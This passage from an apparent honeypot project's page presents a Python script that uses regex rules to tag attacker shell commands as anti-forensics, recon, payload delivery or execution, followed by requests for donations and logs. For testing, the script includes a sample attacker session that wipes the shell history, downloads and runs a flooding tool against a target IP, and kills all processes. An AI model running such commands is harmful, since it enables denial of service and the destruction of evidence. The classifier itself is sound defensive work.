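    ("anti-forensics",    re.compile(r"unset\s+HIST|HISTFILE=|history\s+-c|\.bash_history|^shred\b")),
    # kill -9 -1 kills every process of the user, including the honeypot's shell wrapper
    ("honeypot-evasion",  re.compile(r"^kill\s+-9\s+-1$|^(pkill|killall)\b")),
    ("recon",             re.compile(r"^(uname|id|w|who|last|nproc|ifconfig|netstat)\b"
                                     r"|^cat\s+/proc/(cpuinfo|meminfo|version)")),
    ("payload-delivery",  re.compile(r"^(wget|curl|tftp|ftpget|scp)\b|^tar\s+\S*x|^(gunzip|unzip)\b")),
    ("payload-execution", re.compile(r"^chmod\s+(\+x|[0-7]{3,4})\b|^(\./|nohup\s|perl\s|python\s|sh\s|bash\s)")),
]

SEP_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")

# Constructed session mixing the commands quoted on this page with a typical dropper.
SESSION = [
    "unset HISTFILE HISTSAVE HISTLOG WATCH",
    "uname -a; w",
    "wget http://198.51.100.23/udp.tgz && tar zxvf udp.tgz",
    "cd udp; chmod +x udp; ./udp 203.0.113.9 53 0 300",
    "rm -rf .bash_history",
    "kill -9 -1",
    "exit",
]


def split_session_line(line):
    """Break a shell line into simple commands: 'cd x; chmod +x y && ./y' -> 3 commands."""
    return [c.strip() for c in SEP_RE.split(line) if c.strip()]


def classify_command(cmd):
    """Set of intent tags for one simple command; 'unclassified' when no rule fires."""
    tags = {tag for tag, rx in RULES if rx.search(cmd)}
    return tags or {"unclassified"}


def classify_session(lines):
    return [(cmd, classify_command(cmd)) for line in lines for cmd in split_session_line(line)]


def summarize(lines):
    """Tag counts for the whole session plus the classic dropper signature:
    a download followed by execution."""
    counts = Counter()
    for _, tags in classify_session(lines):
        counts.update(tags)
    return {"tags": dict(counts),
            "dropper": bool(counts["payload-delivery"] and counts["payload-execution"])}


if __name__ == "__main__":
    for cmd, tags in classify_session(SESSION):
        print(f"{', '.join(sorted(tags)):20} {cmd}")
    print(summarize(SESSION))
```

The rules are anchored at the start of each simple command on purpose: "wget" must not match the "w" recon rule, and a URL containing "history" must not trip anti-forensics. The "unclassified" bucket is worth reviewing periodically, since new tooling shows up there first.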
Dumb DoS or speed test?
This project is nonprofit. If you feel you could donate, or you have some hardware you don't need, please contact us.
2-Join us or share your information, findings, logs...
We are always glad to receive information about attackers, new threats, etc. We have also developed some automatic tools that collect, select, classify and merge IPs from a variety of logs. If you think that some logs on your system could help us, please drop us a line. At present we can directly use logs from several P2P programs, some router models, Linux logs and a handful of other stuff.
3-Special request for English speakers
English is not our first language. We would be very grateful if you let us know about typos, weird expressions, etc.
4-Run a honeypot
Straightforward to run, transparent, no installation: just "chmod +x" and you're done. Alternatively you can use our web forms or API. Please contact us for further info.